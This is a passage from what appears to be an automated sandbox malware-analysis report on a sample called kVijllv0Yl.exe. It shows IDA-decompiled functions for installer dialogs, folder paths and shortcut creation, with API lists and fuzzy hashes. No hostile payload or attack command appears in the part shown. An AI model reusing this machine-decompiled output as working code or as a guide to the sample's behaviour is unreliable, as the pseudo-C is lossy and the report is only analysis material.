                  							_a8 = 0x40f;
                  							goto L56;
                  						}
                  					}
                  				} else {
                  					 *0x423f00 = _a4;
                  					_t285 = 2;
                  					_v28 = 0;
                  					_v16 = _t285;
                  					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
                  					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                  					 *0x420480 =  *0x420480 | 0xffffffff;
                  					_v24 = _t250;
                  					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                  					 *0x420474 = _t252;
                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                  					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                  					}
                  					DeleteObject(_v24);
                  					_t286 = 0;
                  					do {
                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                  						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                  							if(_t286 != 0x20) {
                  								_v16 = _t315;
                  							}
                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                  						}
                  						_t286 = _t286 + 1;
                  					} while (_t286 < 0x21);
                  					_t317 = _a16;
                  					_t287 = _v16;
                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                  					_push(0x15);
                  					E00403E37(_a4);
                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                  					_push(0x16);
                  					E00403E37(_a4);
                  					_t318 = 0;
                  					_t288 = 0;
                  					if( *0x423ecc <= 0) {
                  						L19:
                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                  						goto L20;
                  					} else {
                  						_t311 = _v32 + 8;
                  						_v24 = _t311;
                  						do {
                  							_t268 = _t311 + 0x10;
                  							if( *_t268 != 0) {
                  								_v60 = _t268;
                  								_t269 =  *_t311;
                  								_t302 = 0x20;
                  								_v84 = _t288;
                  								_v80 = 0xffff0002;
                  								_v76 = 0xd;
                  								_v64 = _t302;
                  								_v40 = _t318;
                  								_v68 = _t269 & _t302;
                  								if((_t269 & 0x00000002) == 0) {
                  									if((_t269 & 0x00000004) == 0) {
                  										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                  									} else {
                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                  									}
                  								} else {
                  									_v76 = 0x4d;
                  									_v44 = 1;
                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                  									_v28 = 1;
                  									 *( *0x42048c + _t318 * 4) = _t274;
                  									_t288 =  *( *0x42048c + _t318 * 4);
                  								}
                  							}
                  							_t318 = _t318 + 1;
                  							_t311 = _v24 + 0x418;
                  							_v24 = _t311;
                  						} while (_t318 <  *0x423ecc);
                  						if(_v28 != 0) {
                  							L20:
                  							if(_v16 != 0) {
                  								E00403E6C(_v8);
                  								_t280 = _v32;
                  								_t315 = 0;
                  								goto L23;
                  							} else {
                  								ShowWindow(_v12, 5);
                  								E00403E6C(_v12);
                  								L89:
                  								return E00403E9E(_a8, _a12, _a16);
                  							}
                  						}
                  						goto L19;
                  					}
                  				}
                  			}

                  APIs
                  • GetDlgItem.USER32 ref: 00404789
                  • GetDlgItem.USER32 ref: 00404796
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
                  • LoadBitmapA.USER32 ref: 004047F5
                  • SetWindowLongA.USER32 ref: 0040480F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                  • DeleteObject.GDI32(?), ref: 0040486F
                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                  • GetWindowLongA.USER32 ref: 004049A9
                  • SetWindowLongA.USER32 ref: 004049B7
                  • ShowWindow.USER32(?,00000005), ref: 004049C8
                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                  • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                  • GlobalFree.KERNEL32 ref: 00404BB4
                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                  • ShowWindow.USER32(?,00000000), ref: 00404D4A
                  • GetDlgItem.USER32 ref: 00404D55
                  • ShowWindow.USER32(00000000), ref: 00404D5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                  • String ID: $M$N
                  • API String ID: 1638840714-813528018
                  • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                  • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                  • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                  • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                  				signed int _v8;
                  				struct HWND__* _v12;
                  				long _v16;
                  				long _v20;
                  				char _v24;
                  				long _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				long _v40;
                  				signed int _v44;
                  				CHAR* _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				CHAR* _v68;
                  				void _v72;
                  				char _v76;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr _t81;
                  				long _t86;
                  				signed char* _t88;
                  				void* _t94;
                  				signed int _t95;
                  				signed short _t113;
                  				signed int _t117;
                  				char* _t122;
                  				intOrPtr* _t138;
                  				signed int* _t145;
                  				signed int _t148;
                  				signed int _t153;
                  				struct HWND__* _t159;
                  				CHAR* _t162;
                  				int _t163;
                  
                  				_t81 =  *0x41fc68; // 0x0
                  				_v36 = _t81;
                  				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                  				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                  				if(_a8 == 0x40b) {
                  					E0040532A(0x3fb, _t162);
                  					E00405CE3(_t162);
                  				}
                  				if(_a8 != 0x110) {
                  					L8:
                  					if(_a8 != 0x111) {
                  						L20:
                  						if(_a8 == 0x40f) {
                  							L22:
                  							_v8 = _v8 & 0x00000000;
                  							_v12 = _v12 & 0x00000000;
                  							E0040532A(0x3fb, _t162);
                  							if(E00405659(_t180, _t162) == 0) {
                  								_v8 = 1;
                  							}
                  							E00405A85(0x41f460, _t162);
                  							_t145 = 0;
                  							_t86 = E00405DA3(0);
                  							_v16 = _t86;
                  							if(_t86 == 0) {
                  								L31:
                  								E00405A85(0x41f460, _t162);
                  								_t88 = E0040560C(0x41f460);
                  								if(_t88 != _t145) {
                  									 *_t88 =  *_t88 & 0x00000000;
                  								}
                  								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                  									_t153 = _a8;
                  									goto L37;
                  								} else {
                  									_t163 = 0x400;
                  									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                  									_v12 = 1;
                  									goto L38;
                  								}
                  							} else {
                  								if(0 == 0x41f460) {
                  									L30:
                  									_t145 = 0;
                  									goto L31;
                  								} else {
                  									goto L26;
                  								}
                  								while(1) {
                  									L26:
                  									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                  									if(_t113 != 0) {
                  										break;
                  									}
                  									if(_t145 != 0) {
                  										 *_t145 =  *_t145 & _t113;
                  									}
                  									_t145 = E004055BF(0x41f460) - 1;
                  									 *_t145 = 0x5c;
                  									if(_t145 != 0x41f460) {
                  										continue;
                  									} else {
                  										goto L30;
                  									}
                  								}
                  								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                  								_v12 = 1;
                  								_t145 = 0;
                  								L37:
                  								_t163 = 0x400;
                  								L38:
                  								_t94 = E004046C5(5);
                  								if(_v12 != _t145 && _t153 < _t94) {
                  									_v8 = 2;
                  								}
                  								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
                  									E00404610(0x3ff, 0xfffffffb, _t94);
                  									if(_v12 == _t145) {
                  										SetDlgItemTextA(_a4, _t163, 0x41f450);
                  									} else {
                  										E00404610(_t163, 0xfffffffc, _t153);
                  									}
                  								}
                  								_t95 = _v8;
                  								 *0x423f44 = _t95;
                  								if(_t95 == _t145) {
                  									_v8 = E0040140B(7);
                  								}
                  								if(( *(_v36 + 0x14) & _t163) != 0) {
                  									_v8 = _t145;
                  								}
                  								E00403E59(0 | _v8 == _t145);
                  								if(_v8 == _t145 &&  *0x420484 == _t145) {
                  									E0040420A();
                  								}
                  								 *0x420484 = _t145;
                  								goto L53;
                  							}
                  						}
                  						_t180 = _a8 - 0x405;
                  						if(_a8 != 0x405) {
                  							goto L53;
                  						}
                  						goto L22;
                  					}
                  					_t117 = _a12 & 0x0000ffff;
                  					if(_t117 != 0x3fb) {
                  						L12:
                  						if(_t117 == 0x3e9) {
                  							_t148 = 7;
                  							memset( &_v72, 0, _t148 << 2);
                  							_v76 = _a4;
                  							_v68 = 0x420498;
                  							_v56 = E004045AA;
                  							_v52 = _t162;
                  							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                  							_t122 =  &_v76;
                  							_v60 = 0x41;
                  							__imp__SHBrowseForFolderA(_t122);
                  							if(_t122 == 0) {
                  								_a8 = 0x40f;
                  							} else {
                  								__imp__CoTaskMemFree(_t122);
                  								E00405578(_t162);
                  								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
                  								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
                  									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                  									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                  										lstrcatA(_t162, 0x422e40);
                  									}
                  								}
                  								 *0x420484 =  &(( *0x420484)[0]);
                  								SetDlgItemTextA(_a4, 0x3fb, _t162);
                  							}
                  						}
                  						goto L20;
                  					}
                  					if(_a12 >> 0x10 != 0x300) {
                  						goto L53;
                  					}
                  					_a8 = 0x40f;
                  					goto L12;
                  				} else {
                  					_t159 = _a4;
                  					_v12 = GetDlgItem(_t159, 0x3fb);
                  					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                  						E00405578(_t162);
                  					}
                  					 *0x423678 = _t159;
                  					SetWindowTextA(_v12, _t162);
                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                  					_push(1);
                  					E00403E37(_t159);
                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                  					_push(0x14);
                  					E00403E37(_t159);
                  					E00403E6C(_v12);
                  					_t138 = E00405DA3(7);
                  					if(_t138 == 0) {
                  						L53:
                  						return E00403E9E(_a8, _a12, _a16);
                  					}
                  					 *_t138(_v12, 1);
                  					goto L8;
                  				}
                  			}

                  APIs
                  • GetDlgItem.USER32 ref: 004042C1
                  • SetWindowTextA.USER32(?,?), ref: 004042EE
                  • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                  • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                  • lstrcmpiA.KERNEL32(mcchdhqnu,00420498,00000000,?,?), ref: 004043E0
                  • lstrcatA.KERNEL32(?,mcchdhqnu), ref: 004043EC
                  • SetDlgItemTextA.USER32 ref: 004043FC
                    • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                  • SetDlgItemTextA.USER32 ref: 00404549
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                  • String ID: A$C:\Users\user\AppData\Local\Temp$mcchdhqnu
                  • API String ID: 2246997448-1079521717
                  • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                  • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                  • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                  • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                  				signed int _v8;
                  				struct _ITEMIDLIST* _v12;
                  				signed int _v16;
                  				signed char _v20;
                  				signed char _v24;
                  				signed int _v28;
                  				signed int _t36;
                  				CHAR* _t37;
                  				signed char _t39;
                  				signed int _t40;
                  				int _t41;
                  				char _t51;
                  				char _t52;
                  				char _t54;
                  				char _t56;
                  				void* _t64;
                  				signed int _t68;
                  				signed int _t73;
                  				signed char _t74;
                  				char _t81;
                  				void* _t83;
                  				CHAR* _t84;
                  				void* _t86;
                  				signed int _t93;
                  				signed int _t95;
                  				void* _t96;
                  
                  				_t86 = __esi;
                  				_t83 = __edi;
                  				_t64 = __ebx;
                  				_t36 = _a8;
                  				if(_t36 < 0) {
                  					_t36 =  *( *0x42367c - 4 + _t36 * 4);
                  				}
                  				_t73 =  *0x423ed8 + _t36;
                  				_t37 = 0x422e40;
                  				_push(_t64);
                  				_push(_t86);
                  				_push(_t83);
                  				_t84 = 0x422e40;
                  				if(_a4 - 0x422e40 < 0x800) {
                  					_t84 = _a4;
                  					_a4 = _a4 & 0x00000000;
                  				}
                  				while(1) {
                  					_t81 =  *_t73;
                  					if(_t81 == 0) {
                  						break;
                  					}
                  					__eflags = _t84 - _t37 - 0x400;
                  					if(_t84 - _t37 >= 0x400) {
                  						break;
                  					}
                  					_t73 = _t73 + 1;
                  					__eflags = _t81 - 0xfc;
                  					_a8 = _t73;
                  					if(__eflags <= 0) {
                  						if(__eflags != 0) {
                  							 *_t84 = _t81;
                  							_t84 =  &(_t84[1]);
                  							__eflags = _t84;
                  						} else {
                  							 *_t84 =  *_t73;
                  							_t84 =  &(_t84[1]);
                  							_t73 = _t73 + 1;
                  						}
                  						continue;
                  					}
                  					_t39 =  *(_t73 + 1);
                  					_t74 =  *_t73;
                  					_a8 = _a8 + 2;
                  					_v20 = _t39;
                  					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                  					_t68 = _t74;
                  					_t40 = _t39 | 0x00000080;
                  					__eflags = _t81 - 0xfe;
                  					_v28 = _t68;
                  					_v24 = _t74 | 0x00000080;
                  					_v16 = _t40;
                  					if(_t81 != 0xfe) {
                  						__eflags = _t81 - 0xfd;
                  						if(_t81 != 0xfd) {
                  							__eflags = _t81 - 0xff;
                  							if(_t81 == 0xff) {
                  								__eflags = (_t40 | 0xffffffff) - _t93;
                  								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                  							}
                  							L41:
                  							_t41 = lstrlenA(_t84);
                  							_t73 = _a8;
                  							_t84 =  &(_t84[_t41]);
                  							_t37 = 0x422e40;
                  							continue;
                  						}
                  						__eflags = _t93 - 0x1d;
                  						if(_t93 != 0x1d) {
                  							__eflags = (_t93 << 0xa) + 0x424000;
                  							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                  						} else {
                  							E004059E3(_t84,  *0x423ea8);
                  						}
                  						__eflags = _t93 + 0xffffffeb - 7;
                  						if(_t93 + 0xffffffeb < 7) {
                  							L32:
                  							E00405CE3(_t84);
                  						}
                  						goto L41;
                  					}
                  					_t95 = 2;
                  					_t51 = GetVersion();
                  					__eflags = _t51;
                  					if(_t51 >= 0) {
                  						L12:
                  						_v8 = 1;
                  						L13:
                  						__eflags =  *0x423f24;
                  						if( *0x423f24 != 0) {
                  							_t95 = 4;
                  						}
                  						__eflags = _t68;
                  						if(_t68 >= 0) {
                  							__eflags = _t68 - 0x25;
                  							if(_t68 != 0x25) {
                  								__eflags = _t68 - 0x24;
                  								if(_t68 == 0x24) {
                  									GetWindowsDirectoryA(_t84, 0x400);
                  									_t95 = 0;
                  								}
                  								while(1) {
                  									__eflags = _t95;
                  									if(_t95 == 0) {
                  										goto L29;
                  									}
                  									_t52 =  *0x423ea4;
                  									_t95 = _t95 - 1;
                  									__eflags = _t52;
                  									if(_t52 == 0) {
                  										L25:
                  										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                  										__eflags = _t54;
                  										if(_t54 != 0) {
                  											L27:
                  											 *_t84 =  *_t84 & 0x00000000;
                  											__eflags =  *_t84;
                  											continue;
                  										}
                  										__imp__SHGetPathFromIDListA(_v12, _t84);
                  										__imp__CoTaskMemFree(_v12);
                  										__eflags = _t54;
                  										if(_t54 != 0) {
                  											goto L29;
                  										}
                  										goto L27;
                  									}
                  									__eflags = _v8;
                  									if(_v8 == 0) {
                  										goto L25;
                  									}
                  									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                  									__eflags = _t56;
                  									if(_t56 == 0) {
                  										goto L29;
                  									}
                  									goto L25;
                  								}
                  								goto L29;
                  							}
                  							GetSystemDirectoryA(_t84, 0x400);
                  							goto L29;
                  						} else {
                  							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                  							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                  							__eflags =  *_t84;
                  							if( *_t84 != 0) {
                  								L30:
                  								__eflags = _v20 - 0x1a;
                  								if(_v20 == 0x1a) {
                  									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                  								}
                  								goto L32;
                  							}
                  							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                  							L29:
                  							__eflags =  *_t84;
                  							if( *_t84 == 0) {
                  								goto L32;
                  							}
                  							goto L30;
                  						}
                  					}
                  					__eflags = _t51 - 0x5a04;
                  					if(_t51 == 0x5a04) {
                  						goto L12;
                  					}
                  					__eflags = _v20 - 0x23;
                  					if(_v20 == 0x23) {
                  						goto L12;
                  					}
                  					__eflags = _v20 - 0x2e;
                  					if(_v20 == 0x2e) {
                  						goto L12;
                  					} else {
                  						_v8 = _v8 & 0x00000000;
                  						goto L13;
                  					}
                  				}
                  				 *_t84 =  *_t84 & 0x00000000;
                  				if(_a4 == 0) {
                  					return _t37;
                  				}
                  				return E00405A85(_a4, _t37);
                  			}

                  APIs
                  • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                  • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                  • GetWindowsDirectoryA.KERNEL32(mcchdhqnu,00000400), ref: 00405BD9
                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                  • SHGetPathFromIDListA.SHELL32(00000000,mcchdhqnu), ref: 00405C23
                  • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                  • lstrcatA.KERNEL32(mcchdhqnu,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                  • lstrlenA.KERNEL32(mcchdhqnu,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$mcchdhqnu
                  • API String ID: 900638850-2276404844
                  • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                  • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                  • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                  • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00402012() {
                  				void* _t44;
                  				intOrPtr* _t48;
                  				intOrPtr* _t50;
                  				intOrPtr* _t52;
                  				intOrPtr* _t54;
                  				signed int _t58;
                  				intOrPtr* _t59;
                  				intOrPtr* _t62;
                  				intOrPtr* _t64;
                  				intOrPtr* _t66;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				int _t75;
                  				signed int _t81;
                  				intOrPtr* _t88;
                  				void* _t95;
                  				void* _t96;
                  				void* _t100;
                  
                  				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                  				_t96 = E004029E8(0xffffffdf);
                  				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                  				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                  				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                  				if(E004055E5(_t96) == 0) {
                  					E004029E8(0x21);
                  				}
                  				_t44 = _t100 + 8;
                  				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                  				if(_t44 < _t75) {
                  					L13:
                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                  					_push(0xfffffff0);
                  				} else {
                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                  					if(_t95 >= _t75) {
                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                  						_t81 =  *(_t100 - 0x14);
                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                  						if(_t58 != 0) {
                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                  							_t81 =  *(_t100 - 0x14);
                  						}
                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                  						}
                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                  						if(_t95 >= _t75) {
                  							_t95 = 0x80004005;
                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                  								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                  							}
                  						}
                  						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                  					}
                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                  					if(_t95 >= _t75) {
                  						_push(0xfffffff4);
                  					} else {
                  						goto L13;
                  					}
                  				}
                  				E00401423();
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                  				return 0;
                  			}

                  APIs
                  • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
